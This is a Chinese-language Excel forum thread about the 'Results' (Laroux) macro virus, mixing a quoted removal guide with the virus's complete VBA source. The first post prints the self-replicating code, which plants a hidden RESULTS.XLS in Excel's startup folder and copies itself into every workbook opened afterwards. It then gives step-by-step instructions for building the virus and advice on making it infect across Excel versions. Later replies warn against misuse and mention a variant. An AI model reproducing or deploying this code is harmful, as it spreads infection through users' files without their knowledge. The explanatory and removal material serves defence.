Board logo

標題: [分享] EXCEL巨集病毒案例("Results") [打印本頁]
作者: HUNGCHILIN    時間: 2011-2-12 20:16     標題: EXCEL巨集病毒案例("Results")

本帖最後由 HUNGCHILIN 於 2012-6-8 21:22 編輯

2012/6/8日以後EXCEL保護保密技巧帖不再設定閱讀權限

TO 各位夥伴:
Results病毒Macro.Excel.Laroux.cs/X97M.Laroux.DX1
這個不是病毒的病毒在2009年底與2010年初在 各大論壇造成很多困擾
中的人大部分都是VBA高手.大家都罵的要命
至今論壇上只會解除但都一直不知道其原理 如下連結
就在此說明一二

病毒訊息:
[建议] 谁在搞 RESULTS.XLS 这个
[求助] 如何删 VBA project (Results.xls) 除这个东西?
[讨论] Results宏病毒的清除及免疫工具
删除Results病毒的小东东,已测试成功
手工删除RESULT病毒的方法.
[已解决]十万火急的事情,中病毒了。

病毒程序:
大家研究一下results这个宠病毒
[已解决]怎么删除宏病毒!!excel表中毒!!
[已解决]请教:这段代码是什么意思?是病毒吗?

其他解釋(只講一半):
试试这个免疫文件吧:http://www.excelba.com/Soft/Html/143.html
RESULTS.XLS(Macro.Excel.Laroux.cs恶意程序)免疫文件说明
作者:bengdeng | 来源:Excel吧
一、Macro.Excel.Laroux.cs恶意程序简介
病毒类型:宏病毒
病毒行为:
1. 将工作表的激活事件指定为“ck_files”。
2. 在 Excel 的启动目录下生成“RESULTS.XLS”文件并隐藏地打开以便调用其“ck_files”函数。
3. 在打开的原来已包含宏代码的Excel文件时,插入一个Results模块。

二、Macro.Excel.Laroux.cs恶意程序免疫文件使用说明
Macro.Excel.Laroux.cs恶意程序免疫文件下载地址
http://www.excelba.com/Soft/Html/143.html  
下载Macro.Excel.Laroux.cs恶意程序免疫文件后,请关闭Excel
然后把免疫文件覆盖Excel启动目录文件中的RESULTS.XLS
Excel启动文件夹目录为:
C:\Documents and Settings\当前用户名\Application Data\Microsoft\Excel\XLSTART
其中的当前用户名为你当前电脑的用户名
PS:(如果打开此文件时启用宏,则上面的文件夹路径已自动更新并保存)
注意:此免疫文件名称不能改名,包括扩散名.XLS在内都要为大写——即RESULTS.XLS
如果你不想再使用此文件,请进入Excel启动文件夹中删除此RESULTS.XLS文件即可。

三、免疫文件提示信息说明
当打开包含有Macro.Excel.Laroux.cs恶意程序的文件时
免疫程序会提示是否删除!
如果点击是则删除文件中的Macro.Excel.Laroux.cs恶意程序模块!
并提示确认文件完整性后保存!!切记要自己手动保存!
如果点击否则没删除文件中的Macro.Excel.Laroux.cs恶意程序!
您可以自行在VBA编辑器中删除results模块后保存!
当打开包含有Macro.Excel.Laroux.cs恶意程序免疫工作表的文件时
免疫程序会显示此工作表
(注:此工作表为Macro.Excel.Laroux.cs恶意程序运行后从免疫文件中复制并隐藏的)
请确认此工作表为无用工作表后,删除工作表再保存!!

四、免疫文件与Macro.Excel.Laroux.cs恶意程序生成的RESULTS.XLS文件的区别
1、两者都为RESULTS.XLS,但免费文件打开时看到的是使用说明RESULTS工作表
而恶意程序生成的RESULTS.XLS文件打开时为隐藏,你可以在窗口/取消隐藏中看到隐藏的文件。
2、免疫文件中包含一个Results工作表,一个Main_Excelba模块和一个Excelba类模块
而恶意程序生成的RESULTS.XLS文件包含一个Sheet1工作表和一个Results模块。
3、免疫文件让杀毒软件查杀的结果为安全文件
而恶意程序生成的RESULTS.XLS文件查杀结果为不安全文件。

五、快速利用360杀毒确认Excel文件是否包含Macro.Excel.Laroux.cs恶意程序
首先在开始/搜索中,按条件为  *.xls  搜索出所有的Excel文件
然后在按Ctrl+A全选这些文件
再右击利用右键菜单中的使用 360杀毒 扫描查毒
如果在查杀中的威胁名称为:恶意程序(X97M.Laroux.DX1)
就是包括有Macro.Excel.Laroux.cs恶意程序的Excel文件
然后注意!!不要点开始处理
(如果点了开始处理360会删除整个文件包括你有用的内容!!你可以在360杀毒的文件隔离区恢复)
把Excel的安全级别设定为中,一个个打开这些文件
并在打开文件时,禁用宏
然后就可以按免疫文件提示只删除恶意程序而不会删除原来有用的内容。

转载请注明:本文来自:Excel吧 (www.excelba.com) 详细出处参考:http://www.excelba.com/Art/Html/351.html

此法經測試excel95~2010均可用2007以後檔案格式要轉換成xlsm檔
若是作成病毒感染,我會製成xls檔,然後用版本判別程式判斷,使用2007以後版本時會另存成xlsm檔案
這樣感染時各版本就會通用
-----------------------------------------------------------------------------------------------------
注意此檔案,有檔案感染性:
1.執行此附件病毒後,請特別注意到Application.StartupPath 路徑資料夾清除 "RESULTS.XLS"檔案
如何解除,請執行下列程序會自動開啟存放路徑資料夾:
    Sub StartupPathA()
    '使用者電腦上Microsoft Excel 啟動資料夾的完整路徑。
    '設定引用項目Microsoft Shell Controls And Automation
    On Error GoTo Error1
    Dim mySh As Shell32.Shell
    Set mySh = CreateObject("Shell.Application")
    mySh.Explore Application.StartupPath  '任意的資料夾
    Set mySh = Nothing  '物件的釋放
    Error1: End Sub
    '(EXCEL2003版在這路徑,C:\Users\HUNGCHILIN\AppData\Roaming\Microsoft\Excel\XLSTART)

2.請針對此帖內容與檔案保密,洩漏太多,對EXCEL世界會造成混亂
3.此屬秘技中的秘技,沒人知道,就趁此次在此帖作網路上第一次正解原理說明

此檔案模組感染原理:
1.我想這樣大家就會知道,第2點這則連結要如何應用,
有危險、簡單、要設定權限[50]的原因
2.[原創] VBA列出工作表名稱時模組變成工作表且顯示非常隱藏 解答

執行效果:
1.使用此檔 此檔會自動另存 "RESULTS.XLS"檔案到Application.StartupPath 路徑資料夾
2.新增檔案與開啟舊檔都會自動移植入此感染模組,若不注意你所有使用過的EXCEL檔案都會受感染
3.病毒程式如下
-----------------------------------------------------------------------------------------------------
Sub auto_open()
    Application.OnSheetActivate = "ck_files"
End Sub

Sub ck_files()
    c$ = Application.StartupPath
    m$ = Dir(c$ & "\" & "RESULTS.XLS")
    If m$ = "RESULTS.XLS" Then p = 1 Else p = 0
    If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
    whichfile = p + w * 10
   
Select Case whichfile
    Case 10
    Application.ScreenUpdating = False
    n4$ = ActiveWorkbook.Name
    Sheets("results").Visible = True
    Sheets("results").Select
    Sheets("results").Copy
    With ActiveWorkbook
        .Title = ""
        .Subject = ""
        .Author = ""
        .Keywords = ""
        .Comments = ""
    End With
    newname$ = ActiveWorkbook.Name
    c4$ = CurDir()
    ChDir Application.StartupPath
    ActiveWindow.Visible = False
    Workbooks(newname$).SaveAs FileName:=Application.StartupPath & "/" & "RESULTS.XLS", FileFormat:=xlNormal _
        , Password:="", WriteResPassword:="", ReadOnlyRecommended:= _
        False, CreateBackup:=False
    ChDir c4$
    Workbooks(n4$).Sheets("results").Visible = False
    Application.OnSheetActivate = ""
    Application.ScreenUpdating = True
    Application.OnSheetActivate = "RESULTS.XLS!ck_files"
    Case 1
    Application.ScreenUpdating = False
    n4$ = ActiveWorkbook.Name
    p4$ = ActiveWorkbook.Path
    s$ = Workbooks(n4$).Sheets(1).Name
    If s$ <> "results" Then
        Workbooks("RESULTS.XLS").Sheets("results").Copy before:=Workbooks(n4$).Sheets(1)
        Workbooks(n4$).Sheets("results").Visible = False
    Else
    End If
    Application.OnSheetActivate = ""
    Application.ScreenUpdating = True
    Application.OnSheetActivate = "RESULTS.XLS!ck_files"
    Case Else
End Select
End Sub
-----------------------------------------------------------------------------------------------------
P.S.
病毒作法步驟:
1.將上述程式碼COPY到 EXCEL 模組中
2.將模組名稱改為 results
3.[原創] VBA列出工作表名稱時模組變成工作表且顯示非常隱藏 解答
即可完成
作者: Hsieh    時間: 2011-2-13 12:25

回復 1# HUNGCHILIN


   在此鄭重提醒各位版友,重視巨集病毒的問題,了解他,預防他。
千萬別將這些知識拿來做破壞行為。
作者: HUNGCHILIN    時間: 2011-2-20 22:46

有人把這程序 模組名稱改為 "BINV.XLS" 又傳出來
所以看到 "BINV.XLS" 感染則與此原理程式一模一樣
作者: tet208    時間: 2013-3-10 11:02

我在考虑这样的东西..巨集病毒变化太多..甚至每个人下载下来就可以修改,想找一个一劳永逸的方法,可以彻底禁止这样自动复制的恶意程序,同时又不妨碍其他文件和个人工作簿的运行



歡迎光臨 麻辣家族討論版版 (http://forum.twbts.com/)